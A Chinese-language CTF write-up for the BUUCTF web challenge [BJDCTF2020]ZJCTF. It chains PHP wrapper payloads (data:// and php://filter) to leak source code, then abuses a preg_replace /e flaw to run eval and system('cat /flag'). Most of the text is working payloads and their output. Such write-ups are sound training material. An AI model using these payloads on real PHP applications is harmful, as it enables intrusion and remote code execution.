BUUCTF WEB [BJDCTF2020]ZJCTF，不过如此

• 进入环境后得到源码

  <?php
  
  error_reporting(0);
  $text = $_GET["text"];
  $file = $_GET["file"];
  if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){
        
      echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
      if(preg_match("/flag/",$file)){
        
          die("Not now!");
      }
  
      include($file);  //next.php
      
  }
  else{
        
      highlight_file(__FILE__);
  }
  ?>
  

• 使用PHP伪协议构造payload

  ?text=data://text/plain,I have a dream&file=php://filter/convert.base64-encode/resource=next.php
  

  回显

  PD9waHAKJGlkID0gJF9HRVRbJ2lkJ107CiRfU0VTU0lPTlsnaWQnXSA9ICRpZDsKCmZ1bmN0aW9uIGNvbXBsZXgoJHJlLCAkc3RyKSB7CiAgICByZXR1cm4gcHJlZ19yZXBsYWNlKAogICAgICAgICcvKCcgLiAkcmUgLiAnKS9laScsCiAgICAgICAgJ3N0cnRvbG93ZXIoIlxcMSIpJywKICAgICAgICAkc3RyCiAgICApOwp9CgoKZm9yZWFjaCgkX0dFVCBhcyAkcmUgPT4gJHN0cikgewogICAgZWNobyBjb21wbGV4KCRyZSwgJHN0cikuICJcbiI7Cn0KCmZ1bmN0aW9uIGdldEZsYWcoKXsKCUBldmFsKCRfR0VUWydjbWQnXSk7Cn0K
  

  base64解密

  <?php
  $id = $_GET['id'];
  $_SESSION['id'] = $id;
  
  function complex($re, $str) {
        
      return preg_replace(
          '/(' . $re . ')/ei',
          'strtolower("\\1")',
          $str
      );
  }
  
  
  foreach($_GET as $re => $str) {
        
      echo complex($re, $str). "\n";
  }
  
  function getFlag(){
        
  	@eval($_GET['cmd']);
  }
  
  

• 这里可以看出cmd参数存在命令执行漏洞，但问题是如何调用getFlag()函数。这里涉及到 preg_replace /e 模式的代码执行漏洞

  function complex($re, $str) {
        
      return preg_replace('/(' . $re . ')/ei','strtolower("\\1")',$str);
  }
  
  foreach($_GET as $re => $str) {
        
      echo complex($re, $str). "\n";
  }
  

  若payload为

  /?.*={${phpinfo()}}
  

  则

  原先的语句： preg_replace('/(' . $regex . ')/ei', 'strtolower("\\1")', $value);
  变成了语句： preg_replace('/(.*)/ei', 'strtolower("\\1")', {
        ${
        phpinfo()}});
  

  注意：正则表达式模式或部分模式两边添加()将导致匹配到的字符串存储到临时缓冲区中，缓冲区编号从1开始，最多存储99个子表达式。每个缓冲区都可以用\n访问，其中n为缓冲区编号。

  preg_replace('/(.*)/ei', 'strtolower("\\1")', {${phpinfo()}});将会把{${phpinfo()}}存储到缓冲区1，此时匹配后的字符串为/(\\1)/ei，\\1即\1，这将会导致反向引用缓冲区的内容，将其修改为/{${phpinfo()}}/ei，从而导致命令执行。

• 在本题中，PHP会将传入的非法的$_GET数组参数名转化为下划线，即将.*转化为_。可以修改payload为

  ?\S*=${getFlag()}&cmd=...
  

  其中\S表示匹配任何非空白字符，从而达到我们调用getFlag函数的目的

• 构造payload

  ?\S*=${getFlag()}&cmd=system('cat /flag'); 
  

  回显

  flag{6b53cc7c-e9e8-47a1-80ed-10ca16c81ae5} system('cat /flag');